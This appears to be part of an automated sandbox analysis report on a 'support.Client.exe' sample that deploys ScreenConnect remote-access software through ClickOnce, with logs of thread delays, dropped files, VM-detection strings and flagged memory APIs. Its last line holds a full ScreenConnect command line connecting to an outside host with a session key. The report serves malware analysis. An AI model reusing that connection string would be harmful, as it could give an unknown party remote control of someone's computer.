              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 600000
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599874
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599766
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599654
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599542
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599432
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599320
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599209
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599081
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598953
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598841
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598725
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598617
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598506
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598379
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598251
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598126
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597998
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 597886
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597774Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597663Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597551Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597423Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597295Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597184Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597072Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596960Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596848Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596721Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596482Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596370Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596258Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596147Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596035Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595907Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595684Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595573Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595461Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595349Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595221Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595095Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594968Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594856Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594744Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594632Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594520Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594392Jump to behavior
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 9688Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\ScreenConnect.Windows.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsFileManager.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\ScreenConnect.Core.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\ScreenConnect.ClientService.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\ScreenConnect.Client.dllJump to dropped file
              Source: C:\Windows\System32\svchost.exe TID: 6716Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exe TID: 7644Thread sleep time: -40000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -11068046444225724s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -599874s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -599766s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -599654s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -599542s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -599432s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -599320s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -599209s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -599081s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -598953s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -598841s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -598725s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -598617s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -598506s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -598379s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -598251s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -598126s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597998s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597886s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597774s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597663s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597551s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597423s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597295s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597184s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597072s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596960s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596848s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596721s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596593s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596482s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596370s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596258s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596147s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596035s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -595907s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -595796s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -595684s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -595573s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -595461s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -595349s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -595221s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -595095s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -594968s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -594856s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -594744s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -594632s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -594520s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -594392s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe TID: 1228Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe TID: 780Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe TID: 7376Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeThread delayed: delay time: 40000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
              Source: ScreenConnect.ClientService.exe, 00000013.00000002.2403914597.00000000012CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
              Source: svchost.exe, 00000004.00000002.2412623067.00000227B8E62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(c
              Source: svchost.exe, 00000009.00000002.2406431788.0000022170465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: dfsvc.exe, 0000000E.00000002.2367830615.00000212BEF7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: svchost.exe, 00000009.00000002.2405331292.000002217042B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: svchost.exe, 00000009.00000002.2407337158.0000022170490000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
              Source: svchost.exe, 00000004.00000002.2407570348.00000227B7827000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2413049971.00000227B8E69000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFF0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2366106744.00000212BEE92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: svchost.exe, 00000009.00000002.2404460863.000002217040B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
              Source: svchost.exe, 00000009.00000002.2407337158.0000022170490000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
              Source: svchost.exe, 00000009.00000002.2407525579.0000022170502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
              Source: svchost.exe, 00000009.00000002.2406431788.0000022170485000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b
              Source: dfsvc.exe, 0000000E.00000002.2359951085.00000212BB938000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess information queried: ProcessInformation
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess token adjusted: Debug
              Source: C:\Users\user\Downloads\support.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              Source: ScreenConnect.ClientService.dll.14.dr, ClientService.cs Reference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
              Source: ScreenConnect.Windows.dll.14.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
              Source: ScreenConnect.Windows.dll.14.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
              Source: ScreenConnect.Windows.dll.14.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
              Source: ScreenConnect.Windows.dll.14.dr, WindowsMemoryNativeLibrary.cs Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe"
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
